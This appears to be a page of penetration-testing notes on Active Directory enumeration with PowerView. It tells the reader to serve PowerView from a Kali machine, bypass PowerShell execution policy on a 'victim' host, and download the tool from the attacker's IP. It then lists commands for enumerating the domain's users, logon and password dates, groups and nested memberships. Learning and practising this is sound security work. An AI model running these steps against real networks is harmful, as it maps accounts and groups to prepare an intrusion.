Using PowerView Tool to do enumeration

Active Directory Domain Enumeration Part-1 With PowerviewNoRed0x

Step 1: Get the powerview in victim machine:

# Run below command in kali linux terminal:
python3 -m http.server 80 -d /usr/share/windows-resources/powersploit/Recon

# Run below command in victim powershell machine:
powershell -ep bypass
iwr -uri http://$IP_KALI/PowerView.ps1 -Outfile PowerView.ps1
Import-Module .\PowerView.ps1 # Loading the powerview module.

Step 2: Do the enumeration:

You can get the list of commands from here.

About - PowerSploitpowersploit.readthedocs.io

# Get domain information:
Get-NetDomain

# Get a list of all users:
Get-NetUser

# Get selected user attributes:
Get-NetUser | select cn, pwdlastset, lastlogon

# Get a list of all groups:
Get-NetGroup | select cn

# Enumerate a specific group (e.g., Sales Department):
Get-NetGroup "Sales Department" | select member

# List of User with membersof.
Get-NetUser | select cn, pwdlastset, lastlogon, samaccountname, userprincipalname, description, memberof | Format-Table -Wrap -AutoSize

# List of Groups with members in it.
Get-NetGroup | ForEach-Object { Write-Output "Group: $($_.cn)"; Get-DomainGroupMember $_.cn | ForEach-Object { " - Member: $($_.membername)" } }

# List of Groups with members in it. if no member is there in a group then it is not listed.
Get-NetGroup | ForEach-Object { $members = Get-DomainGroupMember $_.cn; if ($members) { Write-Output "Group: $($_.cn)"; $members | ForEach-Object { " - Member: $($_.membername)" } } }

Look if you can find any nested groups !!

PreviousSearching using the script NextEnumerate Operating Systems

Last updated 1 year ago